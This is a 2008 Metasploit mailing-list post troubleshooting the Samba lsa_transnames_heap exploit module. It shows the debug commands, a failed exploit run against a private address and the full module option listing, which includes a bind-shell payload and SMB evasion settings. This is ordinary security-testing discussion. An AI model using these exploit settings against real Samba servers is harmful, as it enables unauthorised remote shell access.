Metasploit mailing list archives
linux/samba/lsa_transnames_heap: "Error: EOFError: end of file reached"
From: hal at deer-run.com (Hal Pomeranz)
Date: Sat, 5 Apr 2008 18:49:36 -0700
Thanks for the response, HD. I wish I had better news for you...
At first glance, I would guess that your log-level in the smbd.conf is set to a non-default value (this causes the exploit to fail because it changes the layout of overwritten structures).
I'm using the stock smb.conf file and "log level" is not explicitly set (nor am I setting it on the command line). During previous attempts I actually did try setting "log level" to values < 2 (per the exploit info)-- no change to the result. I've definitely killed/restarted the server since reverting to the original smb.conf.
In order to determine what caused the EOF error, run the following: msf> setg LogLevel 5 msf> save msf> use exploit/.../ msf> exploit Take a look at .msf3/logs/framework.log (at the end) and see if there is any obvious stack trace (or send me a copy off-list).
I'm getting nothing in framework.log when the exploit runs. Btw, here's the tail of my latest run, showing the output of "set": [*] Trying to exploit Samba with address 0xb80c3000... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0 at ncacn_np:10.66.254.244[\lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0 at ncacn_np:10.66.254.244[\lsarpc] ... [*] Calling the vulnerable function... [-] Error: EOFError: end of file reached msf exploit(lsa_transnames_heap) > set Global ====== Name Value ---- ----- LogLevel 5 Module: linux/samba/lsa_transnames_heap ======================================= Name Value ---- ----- AppendExit false BruteStep 0 BruteWait 0 ConnectTimeout 10 DCERPC::ReadTimeout 0 DCERPC::fake_bind_multi false DCERPC::fake_bind_multi_append 0 DCERPC::fake_bind_multi_prepend 0 DCERPC::max_frag_size 4096 DCERPC::smb_pipeio rw EnableContextEncoding false EncoderDontFallThrough false LPORT 4444 PAYLOAD linux/x86/shell_bind_tcp PrependSetresuid true PrependSetreuid true PrependSetuid true RHOST 10.66.254.244 RPORT 445 SMB::obscure_trans_pipe_level 0 SMB::pad_data_level 0 SMB::pad_file_level 0 SMB::pipe_evasion false SMB::pipe_read_max_size 1024 SMB::pipe_read_min_size 1 SMB::pipe_write_max_size 1024 SMB::pipe_write_min_size 1 SMBDirect true SMBDomain WORKGROUP SMBName *SMBSERVER SMBPIPE LSARPC SMBPass SMBUser SSL false TARGET 4 TCP::max_send_size 0 TCP::send_delay 0 WfsDelay 0 I'm open to further suggestions... -- Hal Pomeranz, Founder/CEO Deer Run Associates hal at deer-run.com Network Connectivity and Security, Systems Management, Training
Current thread:
- linux/samba/lsa_transnames_heap: "Error: EOFError: end of file reached" Hal Pomeranz (Apr 05)
- linux/samba/lsa_transnames_heap: "Error: EOFError: end of file reached" H D Moore (Apr 05)
- linux/samba/lsa_transnames_heap: "Error: EOFError: end of file reached" Hal Pomeranz (Apr 05)
- linux/samba/lsa_transnames_heap: "Error: EOFError: end of file reached" H D Moore (Apr 05)